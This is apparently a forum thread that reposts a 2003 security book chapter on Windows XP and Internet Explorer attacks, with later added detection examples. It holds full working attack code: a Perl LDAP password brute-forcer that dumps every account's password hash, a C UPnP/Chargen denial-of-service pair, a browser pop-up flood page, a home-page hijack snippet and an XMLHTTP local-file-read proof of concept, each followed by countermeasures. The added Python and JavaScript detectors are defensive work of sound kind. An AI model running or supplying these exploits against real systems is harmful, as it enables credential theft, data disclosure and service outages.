getopts("t:d:b:u:l:?", \%args);
if($args{t}) { $target = $args{t}; }
if($args{d}) { $dn = $args{d}; }
if($args{b}) { $base = $args{b}; }
if($args{u}) { $user = $args{u}; }
if($args{l}) { $dictionary = $args{l}; }
if($args{h}) { usage(); }
brute();
ldap_connect(@passwords);
# Connect to the system and try binding to the LDAP server with the
# password array supplied by the brute() function, calls the get_accounts
# function to actually make the connection
sub ldap_connect {
foreach $password (@passwords) {
use Net::LDAP;
$ldap = Net::LDAP->new($target);
$ldap->bind ($dn, password => $password );
$ldap->unbind;
get_accounts($target, $password);
}
}
# Opens the dictionary file and processes each of the passwords into a
# password array to be used during the brute force attack
sub brute {
open(DICT, "<$args{l}") or die "Cannot open: $args{l} $@\n";
@passwords = <DICT>;
close(DICT);
chomp @passwords;
}
# Uses an account out of the password dictionary to try and leverage
# access to the LDAP database
sub get_accounts {
use Net::LDAP;
$ldapc = Net::LDAP->new($target) or die "$@";
$ldapc->bind($dn, password => $password) || die "$@";
$mesg = $ldapc->search (
base => $base,
scope => "subtree",
filter => "(uid=$user)"
);
$mesg->code && die $mesg->error;
$i=0;
foreach $entry ($mesg->all_entries) {
@uid=$entry->get_value('uid');
@pass=$entry->get_value('userpassword');
$test =
($uid[0].":".$pass[0].":".$i.":".$i.":/".$uid[0].":");
if ($test =~ /$uid[0]:{SHA}/) {
print "Password Retrieved is -> $password\n";
sleep 2;
dump_database();
exit;
} else {
$ldapc->unbind;
return 0;
}
}
}
# Dumps the LDAP Database using a password supplied from the brute force
# attack and the corresponding user id (UID)
sub dump_database {
$ldap = Net::LDAP->new($target) or die "$@";
$ldap->bind($dn, password => $password) || die "$@";
$mesg = $ldap->search (
base => $base,
scope => "subtree",
filter => "(uid=*)"
);
$mesg->code && die $mesg->error;
$i=0;
foreach $entry ($mesg->all_entries) {
@uid=$entry->get_value('uid');
@pass=$entry->get_value('userpassword');
print $uid[0].":".$pass[0].":".
$i.":".$i.":/".$uid[0].":\n";
}
$ldap->unbind;
}
# Simply Usage Subfunction that provides the user with some guidance
sub usage {
print <<USAGE;
Usage: perl LDAP_Brute.pl [-?] -tdbul
-t Target IP Address
-d dn -> cn=Manager,o=organization,c=country ( US )
-b base dn (o=Microsoft,c=US)
-u User
-l Password Text File
-h Usage
Sample: perl LDAP_Brute.pl -t 192.168.20.10 -d
cn=Manager,o=MicroSoft,c=US -b o=Microsoft,c=US
-u Test_User -d –l ./dictionary.txt
USAGE
exit;
}


If successful, the attack would gain unauthorized access to an LDAP database
via a successful user account supplied within the specified dictionary file. This
attack or type of attack would prove very useful on a vulnerability assessment
or when trying to compromise a target utilizing an LDAP server. The code is
written in the Perl scripting language and was tested using the Win32 and Linux
ActiveState binaries (ActiveState's ActivePerl: www.activestate.com/Solutions/
Programmer/Perl.plex).
To ensure that this type of attack is not successful, you must enforce a strong
password policy. All of the passwords should contain numeric, alpha, and special
characters and should be a minimum of eight characters long. Another way to
limit your exposure would be to create access control lists minimizing the connections
and users that are able to initiate sessions to the LDAP system.
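A dictionary attack like the one above shows up on the server as a burst of failed simple binds against one DN from one client, often followed by a success. The block below is an added example (not the book's code): it flags that pattern in bind logs and checks candidate passwords against the eight-character, alpha/numeric/special policy recommended above. The log format is a constructed, simplified one and does not reproduce any particular LDAP server's syntax.

```python
"""Detect LDAP bind brute forcing and check the recommended password policy.

Added example, not the chapter's own code. Log lines use a constructed
format: '<ISO timestamp> src=<client IP> dn="<bind DN>" result=<LDAP code>'."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

INVALID_CREDENTIALS = 49   # LDAP resultCode for a failed simple bind
SUCCESS = 0

LINE_RE = re.compile(r'(\S+) src=(\S+) dn="([^"]*)" result=(\d+)')


def parse_line(line: str):
    m = LINE_RE.match(line)
    if m is None:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, src, dn, code = m.groups()
    return datetime.fromisoformat(ts), src, dn, int(code)


class BindBruteForceDetector:
    """Sliding-window counter of failed binds per (client, DN)."""

    def __init__(self, threshold: int = 10, window: timedelta = timedelta(seconds=60)):
        self.threshold = threshold
        self.window = window
        self.failures = defaultdict(deque)   # (src, dn) -> failure timestamps
        self.alerted = set()                 # keys already reported
        self.alerts = []                     # (kind, src, dn, failure_count)

    def observe(self, ts, src, dn, code):
        key = (src, dn)
        q = self.failures[key]
        while q and ts - q[0] > self.window:   # drop failures outside the window
            q.popleft()
        if code == INVALID_CREDENTIALS:
            q.append(ts)
            if len(q) >= self.threshold and key not in self.alerted:
                self.alerted.add(key)
                self.alerts.append(("brute-force", src, dn, len(q)))
        elif code == SUCCESS and key in self.alerted:
            # A success right after a burst of failures: the dictionary
            # probably contained the password, so escalate this one.
            self.alerts.append(("success-after-brute-force", src, dn, len(q)))
            self.alerted.discard(key)
            q.clear()


def scan_log(lines, threshold: int = 10, window_seconds: int = 60):
    det = BindBruteForceDetector(threshold, timedelta(seconds=window_seconds))
    for line in lines:
        det.observe(*parse_line(line))
    return det.alerts


def meets_policy(password: str) -> bool:
    """The chapter's rule: at least eight characters with alpha, numeric and
    special characters present."""
    return (len(password) >= 8
            and any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password)
            and any(not c.isalnum() for c in password))


# Constructed sample: 12 failed binds two seconds apart against the manager
# DN from the sample usage line above, then a success, then unrelated traffic.
_BASE = datetime(2003, 3, 31, 16, 29, 0)
_MANAGER = "cn=Manager,o=Microsoft,c=US"
SAMPLE_LOG = [
    f'{(_BASE + timedelta(seconds=2 * i)).isoformat()} src=10.0.100.50 dn="{_MANAGER}" result=49'
    for i in range(12)
]
SAMPLE_LOG.append(f'{(_BASE + timedelta(seconds=24)).isoformat()} src=10.0.100.50 dn="{_MANAGER}" result=0')
SAMPLE_LOG.append(f'{(_BASE + timedelta(seconds=25)).isoformat()} src=10.0.100.7 dn="uid=alice,o=Microsoft,c=US" result=0')

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
    for pw in ("password", "Passw0rd!"):
        print(pw, "meets policy:", meets_policy(pw))
```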

yuna_admirer
31-03-2003, 16:56
The Plug and Play Denial of Service Attack

The Universal Plug and Play (UPNP) denial of service attack leverages a flaw in
the design of Microsoft's Plug and Play server. A malformed UDP packet is sent
to port 1900 with a NOTIFY request that contains a URL redirect to a system
with a malicious Chargen server. XP opens the requested URL and initiates a
TCP connection to the specified system. Due to an error in the server data processing of the
UPNP service, the system does not conduct any error analysis of the redirect
URL, so any port and system can be specified. Once the TCP request is
sent to the Chargen server, the Chargen server sends a packet with code that utilizes
all of the XP system's memory, sending it into an immediate state of unuse by
consuming all of the available CPU cycles.
The modified source code for this attack is presented shortly (note that some
lines are wrapped). In order for this attack to work, you need the ability to compile
C source code. It has been tested and verified to work on the RedHat 6.2,
Slackware 7.0, and Windows NT/2000/XP platforms. The following steps are
required to successfully execute this attack:

1. Individually compile both of the programs.
2. Run the Chargen.c executable with the port specified in the Notify
request of the UPNP source code (the current default is port 1900).
3. Run the UPNP.c executable and be sure to use the same port number
that the Chargen server is listening on.

If the system is running the Plug and Play service and is not patched, the
attack should work to the extent that the target system must now be rebooted.

Chargen.c
/* Windows XP Plug-n-Play Chargen Server - Dual Platform Exploit
* Run: ./FASL_Chargen.exe <local Chargen Port>
* Ported and Modified By:
* James C. Foster, Tom Ferris, Jim Kovalchuk, Mike Price, and Chad Curtis
* December 20, 2002 */
//To compile on Win32 you must link with the Ws2_32.lib library at compile
//time
#include <stdio.h>
#ifdef WIN32
#include <Winsock2.h>
#include <Windows.h>
#else
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <malloc.h>
#endif
#define BACKLOG 5
#define MAX 500
int main(int argc, char *argv[]) {
int visit=1;
int i, i2, port, sockfd, newfd, numbytes;
char buf[MAX];
char diedbuf[1024];
#ifdef WIN32
WSADATA wsaData;
#endif
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
int sin_size;
if(argc!=2) {
fprintf(stderr,"usage: %s <chargen_port>\n",argv[0]);
return 1;
}
port=atoi(argv[1]);
#ifdef WIN32
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
exit(1);
}
#endif
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(port);
my_addr.sin_addr.s_addr=htonl(INADDR_ANY);
#ifdef WIN32
memset(&(my_addr.sin_zero), 0x0, 8);
#else
bzero(&(my_addr.sin_zero),8);
#endif
if(bind(sockfd, (struct sockaddr *) &my_addr, sizeof(struct sockaddr) ) ==
-1) {
exit(1);
}
if(listen(sockfd, BACKLOG) == -1) {
exit(1);
}
for(i=0;i<1024;i++)
diedbuf[i] = 'q';
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((newfd = accept(sockfd, (struct sockaddr*)&their_addr, &sin_size))==
-1) {
exit(1);
}
#ifndef WIN32
if(!fork()) {
#endif
i2 = 1;
if((numbytes = recv(newfd, buf, MAX, 0)) == -1) {
exit(1);
}
buf[numbytes]='\0';
printf("%s\n", buf);
while(1) {
if(send(newfd,diedbuf,1024,0) ==-1) {
exit(0);
} }
#ifndef WIN32
}
#endif
}
#ifdef WIN32
closesocket(newfd);
#else
close(newfd);
#endif
}
UPNP.c
/* Windows XP Plug-n-Play - Dual Platform Exploit
* ./FASL_uPnP.exe <remote IP> <local IP> <local Chargen Port>
* Ported and Modified By:
* James C. Foster, Tom Ferris, Jim Kovalchuk, Mike Price, and Chad Curtis
* December 20, 2002 */
//To compile on Win32 you must link with the Ws2_32.lib library at compile
//time
#ifdef WIN32 //Library Definitions
#include <Winsock2.h>
#include <Windows.h>
#else
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#endif
#include <stdio.h>
#define MAX 1000
#define PORT 1900
#ifdef WIN32
WSADATA wsaData;
#endif
char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);
strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}
int main(int argc,char *argv[]) {
int sockfd,i;
int numbytes;
int num_socks;
int addr_len;
char recive_buffer[MAX]="";
char send_buffer[MAX]=
"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
"CACHE-CONTROL: max-age=1\r\nLOCATION: http://www.host.com:port/\r\n"
"NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
"NTS: ssdp:alive\r\nSERVER: QB0X/201 UPnP/1.0 prouct/1.1\r\n"
"USN: uuid:QB0X\r\n\r\n\r\n";
char *aux=send_buffer;
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=4) {
fprintf(stderr,"Exploit Usage:%s <remote IP> "\
"<local IP> <local Chargen Port>\n",argv[0]);
exit(1); }
#ifdef WIN32
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
printf("WSAStartup() failed.\n");
exit(1);
}
#endif
aux=str_replace(argv[2],"www.foundstone.com",send_buffer);
aux=str_replace(argv[3],"port",send_buffer);
if((he=gethostbyname(argv[1]))==NULL) {
perror("gethostbyname");
exit(1);
}
if( (sockfd=socket(AF_INET,SOCK_DGRAM,0)) == -1) {
perror("socket"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(PORT);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
#ifdef WIN32
memset(&(their_addr.sin_zero),0,8);
#else
bzero(&(their_addr.sin_zero),8);
#endif
if( (numbytes=sendto(sockfd,send_buffer,strlen(send_buffer),0,\
(struct sockaddr *)&their_addr, sizeof(struct sockaddr))) ==-1) {
perror("send");
exit(0);
}
#ifdef WIN32
closesocket(sockfd);
#else
close(sockfd);
#endif
return 0;
}


The UPNP countermeasure for this vulnerability is twofold. You may choose
to install the recommended hotfix or install the Windows XP Professional Service
Pack 1, both of which you can find in the Windows Update Catalog at
http://windowsupdate.microsoft.com. The second choice you have, just as easy
as the first, would be to disable the Plug and Play service for your system. However,
realize that if you do choose to disable this service it will obviously not be available
for any real-time automatic identification or configuration of peripheral devices.
Double-click the Plug and Play service from within the Services Management
interface and change the Startup type to Disabled. Ensure that your configuration
dialog box matches Figure 4.5. Our recommendation is to just patch the
system because the feature is quite helpful. More information on the UPNP vulnerability
can be found at the following links.

- eEye Research Advisory (www.eeye.com/html/Research/Advisories/
AD20011220.html)
- Microsoft Security Bulletin (www.microsoft.com/technet/security/
bulletin/MS01-059.asp)
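Beyond patching, the NOTIFY described above is easy to spot on the wire: a legitimate device advertises its own description URL, whereas the attack's LOCATION points the client at a different host and port. The following is an added example (not the book's code) that parses SSDP NOTIFY datagrams and reports that redirect pattern; the three datagrams are constructed, one from a normal gateway, one modelled on the exploit's NOTIFY with 192.0.2.10:19 standing in for the rogue Chargen server, and one with the unfilled "www.host.com:port" template.

```python
"""Inspect SSDP NOTIFY datagrams for the off-host LOCATION redirect used by
the UPnP denial of service described above.

Added example, not the chapter's own code; the datagrams below are
constructed for the demonstration."""
import ipaddress
from urllib.parse import urlsplit

LOCAL_NETS = [ipaddress.ip_network("10.0.100.0/24")]   # assumed local segment


def parse_notify(datagram: bytes) -> dict:
    """Return the header fields of an SSDP NOTIFY as an upper-cased dict."""
    text = datagram.decode("ascii", "replace")
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not lines[0].startswith("NOTIFY * HTTP/1.1"):
        raise ValueError(f"not an SSDP NOTIFY: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().upper()] = value.strip()
    return headers


def inspect_notify(src_ip: str, datagram: bytes, local_nets=LOCAL_NETS) -> list:
    """Findings for one NOTIFY seen from src_ip; an empty list means benign."""
    headers = parse_notify(datagram)
    location = headers.get("LOCATION")
    if location is None:
        return ["missing-location"]
    try:
        url = urlsplit(location)
        host, port = url.hostname, url.port   # .port raises on a non-numeric port
    except ValueError:
        return ["malformed-location"]
    if host is None:
        return ["malformed-location"]
    if port is None:
        port = 80 if url.scheme == "http" else 443

    findings = []
    src = ipaddress.ip_address(src_ip)
    try:
        loc_ip = ipaddress.ip_address(host)
    except ValueError:
        # Devices advertise an IP literal; a name forces a DNS lookup first.
        findings.append("location-host-is-a-name")
        loc_ip = None
    if loc_ip is not None:
        if loc_ip != src:
            findings.append("location-host-differs-from-sender")
        if not any(loc_ip in net for net in local_nets):
            findings.append("location-host-off-link")
    if port < 1024 and port != 80:
        # Description documents are served over HTTP; a well-known non-HTTP
        # port (19 is chargen) is the redirect pattern from the attack.
        findings.append(f"location-port-{port}-not-http")
    return findings


# Constructed datagrams.
BENIGN_NOTIFY = (b"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                 b"CACHE-CONTROL: max-age=1800\r\n"
                 b"LOCATION: http://10.0.100.1:49152/gatedesc.xml\r\n"
                 b"NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
                 b"NTS: ssdp:alive\r\nSERVER: RouterOS/1.0 UPnP/1.0 igd/1.0\r\n"
                 b"USN: uuid:0a0b0c0d-0000-1000-8000-000000000001::upnp:rootdevice\r\n\r\n")

ROGUE_NOTIFY = (b"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                b"CACHE-CONTROL: max-age=1\r\nLOCATION: http://192.0.2.10:19/\r\n"
                b"NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
                b"NTS: ssdp:alive\r\nSERVER: QB0X/201 UPnP/1.0 prouct/1.1\r\n"
                b"USN: uuid:QB0X\r\n\r\n\r\n")

TEMPLATE_NOTIFY = ROGUE_NOTIFY.replace(b"http://192.0.2.10:19/", b"http://www.host.com:port/")

if __name__ == "__main__":
    for label, src, dgram in (("gateway", "10.0.100.1", BENIGN_NOTIFY),
                              ("rogue", "10.0.100.50", ROGUE_NOTIFY),
                              ("template", "10.0.100.50", TEMPLATE_NOTIFY)):
        print(label, inspect_notify(src, dgram))
```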

yuna_admirer
01-04-2003, 13:39
XP Access Point Information Disclosure

XP Professional comes bundled with the capability to communicate over a wireless
802.11 connection without the need for any additional drivers to be
installed. The access point (AP) registration feature within XP allows a user to
store the commonly-used, or in the case of an enterprise user, the organization's
access point Service Set identifier (SSID) strings within the operating system
itself. This feature allows a wireless LAN administrator to lock down the AP to
the extent that it does not have to send client broadcasts or even respond to Null
AP broadcasts. As shown in Figure 4.6, the XP Professional system sends a typical broadcast
802.11 packet searching for available access points. The AP responds with its
SSID, and the system initiates communication, provided that the AP matches an
SSID within the registered configuration.
Figure 4.7 displays how the information leakage actually takes place and how
an attacker could leverage such retrieved data. As with the previous scenario, the
XP Professional system sends a Null broadcast packet, with the difference being
that it does not receive a response. It then starts sending specific AP requests that
include the desired SSID strings configured within XP. A looping process starts,
allowing the innocent XP system to continually search for the configured access
points via SSID. An attacker could leverage this if they were able to capture one
of the requested SSID packets and configure their AP or 802.11 node to use
that same SSID, so that on the next packet the innocent client transmitted, they
would be able to send a successful response from the corresponding AP. In XP
Professional, after the client successfully associates with a configured AP, the session
begins. In the case that the Wired Equivalent Protocol (WEP) is utilized, it
sends the WEP key as part of the transmission. So in this case, the attacker could
gain the configured SSIDs within the system and could be on the receiving end
of an unencrypted link to the wire.
Microsoft has not yet released an advisory or statement on the Windows XP
access point information disclosure vulnerability; therefore you have a few
choices for securing your systems. If you want or need to use Microsoft’s
embedded wireless functionality, the first recommendation would be to not store
the SSIDs of the systems you frequently visit. Another way to alleviate the issue is
to utilize a third-party driver instead of the Microsoft-developed 802.11
wireless drivers. As always, if you do not use the service, in this case the wireless
service, disable it from the System Services Management Interface.

yuna_admirer
01-04-2003, 13:42
Local Exploits

Local exploits usually require multiple prerequisites for the attacks to work, and
statistically most are related to unauthorized information disclosure or system
denial of service. The most popular slew of local attacks was released when Java
was first introduced as a fully-featured mobile code language of the Internet.
Numerous flaws in the language design allowed attackers to do anything from creating infinite loops
that caused a complete denial of service, to grabbing local files and sending them
to a Web site of choice, to the most dangerous: executing arbitrary files locally
through a hole in the Java Virtual Machine. Most of the XP Professional-
specific or inclusion attacks can be exploited with Internet Explorer's implementation
of key scripting and programming parser engines.
JavaScript and the Microsoft implementation, JScript, have become two of the
most popular mobile code Web scripting languages. Due to the popularity and
continuous increase in scripting language functionality, numerous vulnerabilities
have been identified. In most cases, the public vulnerabilities target the browser
or system implementation flaw of the bugs and not the built-in language functionality.
Security controls such as the Software Restriction Policy and advanced
browser settings help combat these types of vulnerabilities, but no current
method alleviates all of the issues. This section provides you with details for
coding attacks to take advantage of unpatched and uneducated Web users via
Internet Explorer and XP design flaws.


The Internet Explorer JavaScript IE Modeless Pop-Up DoS

The JavaScript IE reboot attack exploits a flaw in Internet Explorer to the extent
that it automatically requires the system to restart by consuming all of the available
resources. The implementation flaw of IE allows an indefinite loop to be
created that continuously pops up new browsers until you cannot possibly stop
the ongoing process. The attack is exponentially aggressive since each new thread
of the attack starts a new thread of the continuous loop.
The following is the JavaScript code to exploit the attack. You must place this
HTML code into a file called fploit.html.

<html>
<head>
<script type="text/javascript">
function exploit() {
while(1) {
showModelessDialog("fploit.html");
}
}
</script>
</head>
<body onLoad="exploit()">
</body>
</html>

To fix this annoying little problem, you can either patch your browser or disable
JavaScript within your Advanced Security Control settings within IE. The patched
browser modifies the fashion in which files are opened via JavaScript functions.

The Internet Explorer JavaScript Change Home Page

This JavaScript browser hack has quickly become one of the most popular
mobile code attacks on the Internet. The flaw allows Web sites to replace the current home page configured in the browser by means of automated
script code. It is extremely devious since it could automatically set your
page to a malicious Web site, a Web site that may be against company policy, or
merely a site that you would not have visited otherwise. In all reality, the extent
of the vulnerability can be compared to that of an automated Web site redirect.
The actual exploit script code shown here details the executed functions and the
location for you to input the new desired home page address:

<a href="#" onClick="this.style.behavior='url(#default#homepage)';
this.setHomePage('http://www.poc2.com');">
<font color="black">go ahead and change it</font></a>

To fix this IE issue, you would need to update your IE browser to the latest
version supplied by Microsoft since the problem was addressed in the release of
IE 6. The IE engineers have added a protection that creates an automatic pop-up
window alerting you when a Web site attempts to automatically change your
home page, as shown in Figure 4.8.

yuna_admirer
01-04-2003, 13:45
The Internet Explorer XMLHTTP Active X Bug

The Internet Explorer XMLHTTP Active X bug allows a remote Web server to
retrieve and read arbitrary files located locally on the target system. It has not
proven capable for modifying, deleting, or writing to any system files or directories.
The XMLHTTP control is bundled with the Microsoft core XML services that are
used in parsing XML formatted data. It allows for the system to use Hypertext
Transfer Protocol (HTTP) functions such as GET, POST, and PUT to aid in utilizing
XML files. Microsoft’s software flaw was its implementation of the security
control over a redirected data stream requested from a data request to a Web site.
In order for the vulnerability to work, the malicious user needs to know the
complete path to the target file on the target system. A suitable target file is a file
that is located on all systems and is in cleartext. Another obvious prerequisite of
the attack is that a user must initiate a connection to a malicious Web site.
Because of this, it is hard to target specific systems. Moreover, the malicious site
and attacker would target site visitors using a vulnerable browser on a specific
operating system. If you think it sounds like there are a lot of "ifs," you are absolutely right. In general, client-side vulnerabilities require a great deal of
chance and in most cases do not provide the instant attacker gratification of
obtaining Administrator quickly. Any cleartext file that can be perceived as valuable
could be an ample target file. The C:\Windows\System32\AutoExec.NT
file is a perfect example of the type of file that could be targeted. The following
code is a proof of concept script that exploits the XMLHTTP bug:


<HTML>
<BODY onload="KickIt()">
<h4>Back to <a href="/unpatched/">Unpatched IE vulnerabilities</a></h4>
<script language="jscript">
function KickIt() {
var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
var sURL = "xmlhttp.asp?file=" + escape(whichFile.value) + "&rand="
+ (new Date()).getTime()
xmlhttp.Open("GET", sURL, false);
try{xmlhttp.Send();}
catch(e){
return Stuff.innerText = "File not found"
}
Stuff.innerText = xmlhttp.responseText
}
</script>
<P>Here you go, your
file:///<input type=text style="border:1px solid;width:300px" value=
"C:/TARGET_LOCAL_FILE" onchange="KickIt()" id=whichFile tabindex=1> file
<input type=button onclick="KickIt()" style="border:1px solid black" value=
"Read file">
</P>
<xmp id=Stuff tabindex=-1></xmp>
</BODY></HTML>

The countermeasure for this bug is simply an IE hotfix (MS02-008) that was
released soon after the release of the vulnerability. For more information on the
patch and the installation process, refer to the Microsoft Technet security bulletin
at www.microsoft.com/technet/security/bulletin/MS02-008.asp.
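As an added example that is not part of the Special Ops chapter or of this post, the following JavaScript (runnable under Node) is a small content-inspection rule of the kind a web proxy or mail gateway could apply to pages like the proof of concept above: it flags markup that instantiates the Microsoft.XMLHTTP control and also mentions a local file path, which is the combination the bug depends on, while letting a page that uses the same control for an ordinary relative URL through. The function names and both sample pages are constructed for this illustration and are not from the page.

```javascript
// Added example (not from the Special Ops chapter or this post): a content
// inspection rule that flags pages combining the Microsoft.XMLHTTP control
// with a local file path. Function names and both sample pages are
// constructed for this illustration.

// Instantiation of the ActiveX control addressed by MS02-008.
const XMLHTTP_RE = /new\s+ActiveXObject\s*\(\s*["']Microsoft\.XMLHTTP["']\s*\)/i;
// A file:/// URL or a drive-letter path such as C:/ or C:\ (the word
// boundary keeps "http://" from matching on its "p:/").
const LOCAL_PATH_RE = /(?:file:\/\/\/|\b[A-Za-z]:[\\/])[^"'<>\s&]*/g;
// The fetched body being written into the document, where the user or
// further script on the page can read it.
const RESPONSE_TO_DOM_RE = /\.(?:innerText|innerHTML|textContent)\s*=\s*\w+\.responseText/i;

function scanPage(html) {
  const usesXmlHttp = XMLHTTP_RE.test(html);
  const localPaths = Array.from(new Set(html.match(LOCAL_PATH_RE) || []));
  const copiesResponseToDom = RESPONSE_TO_DOM_RE.test(html);
  const reasons = [];
  if (usesXmlHttp) reasons.push("instantiates Microsoft.XMLHTTP");
  if (localPaths.length > 0) reasons.push("references local path(s): " + localPaths.join(", "));
  if (copiesResponseToDom) reasons.push("copies responseText into the document");
  return {
    usesXmlHttp,
    localPaths,
    copiesResponseToDom,
    // The control on its own is legitimate; the control together with a
    // local path is the pattern worth logging or blocking.
    suspicious: usesXmlHttp && localPaths.length > 0,
    reasons,
  };
}

// Constructed sample with the structure of the proof-of-concept page.
const SUSPECT_PAGE = [
  '<script language="jscript">',
  'function KickIt() {',
  '  var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");',
  '  xmlhttp.Open("GET", "xmlhttp.asp?file=" + escape(whichFile.value), false);',
  '  xmlhttp.Send();',
  '  Stuff.innerText = xmlhttp.responseText',
  '}',
  '</script>',
  'file:///<input type=text value="C:/TARGET_LOCAL_FILE" id=whichFile>',
].join("\n");

// Constructed sample of a benign page: the same control fetching a relative
// XML resource, with no local path, so it should pass.
const BENIGN_PAGE = [
  '<script language="jscript">',
  'var req = new ActiveXObject("Microsoft.XMLHTTP");',
  'req.Open("GET", "/catalog/items.xml", false);',
  'req.Send();',
  'Output.innerText = req.responseText;',
  '</script>',
].join("\n");

for (const [name, page] of [["suspect", SUSPECT_PAGE], ["benign", BENIGN_PAGE]]) {
  const r = scanPage(page);
  console.log(name + ": " + (r.suspicious ? "FLAG" : "pass") + " (" + r.reasons.join("; ") + ")");
}
```

The rule deliberately keys on the combination rather than on the control alone, because Microsoft.XMLHTTP is also what legitimate pages used to fetch XML; a gateway rule that fired on every instantiation would be noise. It is a heuristic, not a substitute for the hotfix: the page itself states that the countermeasure is MS02-008.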

yuna_admirer
01-04-2003, 13:48
The XP Restore Bug

Microsoft Windows XP Professional and Home editions store sensitive system
restore information in the System32 Volume Information directory. Via a default
installation, this directory has adequate access security controls and permissions;
however, unless reconfigured, the subfolders do not inherit these controls. This
allows users who may not have the appropriate privileges to view files and the
contents of any of the subdirectories if they know the full path of the targeted
file. This vulnerability is also one of local access that would allow a malicious user
to gain sensitive system information and also the potential of placing executable
code in shared space on the system. The fix for this issue is rather simple; you
must ensure that only the Administrators group, or whatever group you deem
appropriate, has access to the System32 Volume Information subdirectories.

The Internet Explorer 6.0 Upgrade and Downgrade Issue

A problem has been identified in the upgrade process from a previous Windows
system to XP Professional. It is an atypical problem because it is not the common
type of vulnerability that can be exploited remotely or even locally. However, one
can utilize a flaw in the upgrade process designed by Microsoft. The situation
exists when you are upgrading an old system such as Windows 98 or 2000 to XP
Professional and you already have a patched version of Internet Explorer 6.0
installed. It was published that the IE 6.0 patches and hotfixes do not roll over
with the system upgrade, thereby leaving an unpatched browser. The vulnerability
increases in risk when users may believe they are running a completely patched
version of Internet Explorer 6.0, thus thinking they are invulnerable to multiple
browser client-side type attacks such as information disclosure and arbitrary code
execution.
One other issue that may pose as an obstacle is that Microsoft does not provide
the capability to provide the old patches and hotfixes via the automated Windows
Update service. This poses serious issues when attempting to lock down your
system from a server and client perspective. As stated, this vulnerability is atypical,
but I include it here for user awareness and informational purposes.